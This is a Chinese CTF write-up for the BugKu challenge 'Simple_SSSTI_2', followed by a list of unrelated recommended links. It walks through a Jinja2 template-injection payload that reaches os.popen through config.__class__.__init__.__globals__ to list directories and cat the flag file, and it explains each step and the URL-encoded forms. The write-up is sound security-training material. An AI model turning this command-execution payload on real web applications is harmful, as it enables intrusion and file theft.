BugKu: Simple_SSSTI_2

1.打开题目

由提示可知需要传入一个名为flag的参数

2.查看网页源代码

并没有得到有用的信息

3.查看config对象

复制代码
http://114.67.175.224:10934/?flag={{config}}

信息太乱了,需要找到我们需要的信息

4.SSTI模版注入

复制代码
http://114.67.175.224:10934/?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

代码解读:

复制代码
{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

class:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。

init :初始化类,返回的类型是function。

globals[]:使用方式是函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。

os.popen()方法:用于从一个命令打开一个管道。

open() 方法:用于打开一个文件,并返回文件对象。

小结:用_class_来查看config(系统)的类,用_init_来将这个类改为function,用_globals_[]来获取function里面的所有东西,os.popen()来打开一个管道,将function里面的东西通过管道读取出来。

专业来说:使用了模板引擎的功能来访问Python的config对象,通过链式属性访问(__class__, __init__, __globals__)来获取对Python标准库的os模块的访问权。一旦获得对os模块的访问,攻击者就可以通过popen方法执行任意的系统命令。

拓展:

复制代码
{{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

%20:空格字符的URL编码。

%27:单引号(')的URL编码。

URL编码,也称为百分号编码,使用百分号%后跟两位十六进制数来表示字符。对于空格字符,其ASCII码值为32(十六进制为20),因此被编码为%20。因为只有使用URL编码才能安全地嵌入到URL中。这种编码方式允许URL传输那些在一般情况下可能被视为控制字符或具有特殊意义的字符。

5.分析文件

查看app文件,用ls查看app文件里面的内容

复制代码
{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}

使用cat查看flag文件内容,cat ../app/flag

复制代码
{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

成功拿到flag!

相关推荐
IT成长日记2 小时前
【Docker基础】Docker数据持久化与卷(Volume)介绍
运维·docker·容器·数据持久化·volume·
热爱生活的猴子2 小时前
阿里云服务器正确配置 Docker 国内镜像的方法
服务器·阿里云·docker
一只栖枝3 小时前
网络安全 vs 信息安全的本质解析:数据盾牌与网络防线的辩证关系关系
网络·网络安全·信息安全·it·信息安全认证
安全系统学习3 小时前
【网络安全】Mysql注入中锁机制
安全·web安全·网络安全·渗透测试·xss
物联网老王4 小时前
Ubuntu Linux Cursor 安装与使用一
linux·运维·ubuntu
艾伦_耶格宇5 小时前
【ACP】阿里云云计算高级运维工程师--ACP
运维·阿里云·云计算
一位摩羯座DBA6 小时前
Redhat&Centos挂载镜像
linux·运维·centos
学习3人组6 小时前
CentOS配置网络
linux·网络·centos
怦然星动_6 小时前
DHCP中继及动态分配
网络安全
计算机毕设定制辅导-无忧学长6 小时前
西门子 PLC 与 Modbus 集成:S7-1500 RTU/TCP 配置指南(一)
服务器·数据库·tcp/ip